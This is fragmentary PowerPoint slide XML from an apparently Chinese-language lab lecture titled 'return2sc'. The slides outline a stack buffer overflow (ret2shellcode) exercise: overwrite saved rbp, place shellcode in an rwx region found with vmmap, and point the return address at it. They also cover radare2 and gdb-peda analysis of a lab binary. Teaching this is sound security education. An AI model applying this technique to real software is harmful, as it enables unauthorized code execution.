        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="34319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8316" y="5267630"/>
            <a:ext cx="2178657" cy="6281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RETURN ADDRESS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8316" y="4594245"/>
            <a:ext cx="2178657" cy="6281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Saved </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>rbp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8315" y="4051080"/>
            <a:ext cx="2178657" cy="377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8315" y="3590741"/>
            <a:ext cx="2178657" cy="377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8315" y="3136663"/>
            <a:ext cx="2178657" cy="377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08314" y="2676324"/>
            <a:ext cx="2178657" cy="377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8314" y="2229726"/>
            <a:ext cx="2178657" cy="377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buffer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08313" y="1769387"/>
            <a:ext cx="2178657" cy="377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2793705" y="2229726"/>
            <a:ext cx="0" cy="29926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834790" y="2155153"/>
            <a:ext cx="28276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②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buffer overflow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一直蓋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saved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rbp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408313" y="6027003"/>
            <a:ext cx="38847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③在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address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處填入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你的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code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位址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4470463" y="4373195"/>
            <a:ext cx="439094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①將你的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code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注入到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程式可執行區段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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="16" name="直線單箭頭接點 15"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="2" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="2586973" y="5581706"/>
            <a:ext cx="301354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703883" y="5329268"/>
            <a:ext cx="2178657" cy="62815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Shell code</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW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5600516" y="6134724"/>
            <a:ext cx="3140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如何找到一段區間是程式可執行區段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vmmap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找到具有</a:t>
            </a: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rwx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權限</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="矩形 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="330199" y="243538"/>
            <a:ext cx="841092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000" b="1" dirty="0" smtClean="0"/>
              <a:t>關鍵點</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" b="1" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" b="1" dirty="0" smtClean="0"/>
              <a:t>(1)Buffer overflow </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>蓋</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2000" b="1" dirty="0" smtClean="0"/>
              <a:t>多少</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" b="1" dirty="0" smtClean="0"/>
              <a:t>?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" b="1" dirty="0" smtClean="0"/>
              <a:t>(2)shell code?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" b="1" dirty="0" smtClean="0"/>
              <a:t>(3)Shell code</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2000" b="1" dirty="0" smtClean="0"/>
              <a:t>要注入到哪裡</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" b="1" dirty="0" smtClean="0"/>
              <a:t>?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2000" b="1" dirty="0" smtClean="0"/>
              <a:t>開始位址</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" b="1" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2000" b="1" dirty="0" smtClean="0"/>
              <a:t>要寫入到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" b="1" dirty="0" smtClean="0"/>
              <a:t>RETURN ADDRESS)?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2000" b="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2000" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="150988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15" y="1917901"/>
            <a:ext cx="8573570" cy="364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0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 smtClean="0"/>
              <a:t>逆向分析</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="6600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" smtClean="0"/>
              <a:t>static </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0"/>
              <a:t>analysis == &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" smtClean="0"/>
              <a:t>radare2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" smtClean="0"/>
              <a:t>dynamic </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0"/>
              <a:t>analysis == &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" err="1"/>
              <a:t>gdb-peda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14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static analysis == &gt; radare2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6" y="1465069"/>
            <a:ext cx="7514236" cy="488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9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68" y="2128961"/>
            <a:ext cx="4229618" cy="326798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385187" y="5009321"/>
            <a:ext cx="2178657" cy="6281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RETURN ADDRESS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85187" y="4335936"/>
            <a:ext cx="2178657" cy="6281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Saved </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>rbp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85185" y="1971417"/>
            <a:ext cx="2178657" cy="23192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Local_20h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212398" y="2970888"/>
            <a:ext cx="9877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0x20</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="矩形 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5212398" y="4290704"/>
            <a:ext cx="7793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0x8</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="13" name="直線接點 12"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4968682" y="1993440"/>
            <a:ext cx="13737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4968681" y="4290704"/>
            <a:ext cx="13737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4968681" y="4959875"/>
            <a:ext cx="137372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33" y="536630"/>
            <a:ext cx="4099153" cy="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1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53" y="995030"/>
            <a:ext cx="4224894" cy="326773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207368" y="2444234"/>
            <a:ext cx="15528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./ret2sc</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>Name:a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Try your </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>best:s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80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</TotalTime>
  <Words>583</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>如螢幕大小 (4:3)</PresentationFormat>
  <Paragraphs>165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微軟正黑體</vt:lpstr>
      <vt:lpstr>新細明體</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Calibri Light</vt:lpstr>
      <vt:lpstr>Office 佈景主題</vt:lpstr>
      <vt:lpstr>return2sc</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>static analysis == &gt; radare2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shellcode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lab3/ret2sc.c</vt:lpstr>
      <vt:lpstr>angelboy解答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return2sc</dc:title>
  <dc:creator>Ben Tseng</dc:creator>
  <cp:lastModifiedBy>Ben Tseng</cp:lastModifiedBy>
  <cp:revision>23</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-10-11T14:45:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-10-15T08:21:28Z</dcterms:modified>
</cp:coreProperties>
</file>